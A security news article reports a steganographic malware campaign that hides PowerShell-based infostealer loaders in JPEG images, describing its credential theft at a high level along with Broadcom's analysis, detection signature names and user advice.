New Steganographic Malware Exploits JPEG Files to Distribute Infostealers

A sophisticated malware campaign employing steganographic techniques has recently been identified, targeting users through seemingly innocent JPEG image files.

The attack leverages hidden malicious code embedded within image files that, when executed, initiates a complex chain of events designed to steal sensitive information from victims’ systems.

This new threat represents a concerning evolution in malware distribution methods, combining social engineering with advanced obfuscation techniques.

The attack begins with victims being lured into downloading what appears to be a standard JPEG file.

However, these images contain concealed malicious scripts that remain undetectable to conventional security measures.

Once the compromised file is accessed, the embedded code activates silently in the background.

Broadcom analysts detected that the malware employs a multi-stage infection process that begins with the extraction of the hidden payload from the image file.

“The steganographic technique used in this campaign is particularly sophisticated, making detection challenging for traditional security tools,” noted the researchers in their technical analysis.

Upon execution, the malware targets credential repositories in browsers, email clients, and FTP applications.

The extracted data is then exfiltrated to command-and-control servers while additional payloads are downloaded, including customized versions of known infostealer families such as Vidar, Raccoon, and Redline.

Attack Analysis

The malware authors utilized advanced obfuscation techniques, including base64 encoding within PowerShell scripts to evade detection.

The initial script, after being extracted from the JPEG file, uses Windows Script Host to execute commands with minimal visibility.

The malicious code identified includes instructions for harvesting credentials from multiple browsers, with specific functions targeting cookie files, saved passwords, and form data.

Protection against this threat is available through several security products, with specific detection signatures including ACM.Ps-Base64!g1, ISB.Downloader!gen80, and Heur.AdvML.B.

Users are advised to exercise caution when downloading image files from untrusted sources and ensure their security solutions are updated with the latest definitions.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free